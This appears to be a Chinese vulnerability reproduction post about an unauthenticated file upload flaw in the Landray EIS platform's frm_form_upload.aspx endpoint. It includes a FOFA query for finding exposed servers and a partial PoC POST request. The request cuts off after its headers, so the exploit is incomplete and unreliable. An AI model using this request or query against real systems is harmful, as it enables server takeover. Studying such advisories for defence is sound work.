0x01 產(chǎn)品簡介
藍(lán)凌EIS智慧協(xié)同平臺(tái)是一款專為企業(yè)提供高效協(xié)同辦公和團(tuán)隊(duì)合作的產(chǎn)品。該平臺(tái)集成了各種協(xié)同工具和功能,旨在提升企業(yè)內(nèi)部溝通、協(xié)作和信息共享的效率。
0x02 漏洞概述
藍(lán)凌EIS智慧協(xié)同平臺(tái)?frm_form_upload.aspx接口處存在任意文件上傳漏洞,未經(jīng)過身份認(rèn)證的攻擊者可通過構(gòu)造壓縮文件上傳惡意后門文件,遠(yuǎn)程命令執(zhí)行,獲取服務(wù)器權(quán)限。
0x03 復(fù)現(xiàn)環(huán)境
FOFA:app="Landray-EIS智慧協(xié)同平臺(tái)"
文章來源:http://www.zghlxwxcb.cn/news/detail-816658.html
0x04 漏洞復(fù)現(xiàn)
PoC文章來源地址http://www.zghlxwxcb.cn/news/detail-816658.html
POST /frm/frm_form_upload.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: ASP.NET_SessionId=fqq0ks45w4yqpev52l3adnet; FIOA_IMG_FOLDER=FI; Lang=zh-c
到了這里,關(guān)于藍(lán)凌EIS智慧協(xié)同平臺(tái) frm_form_upload.aspx 文件上傳漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!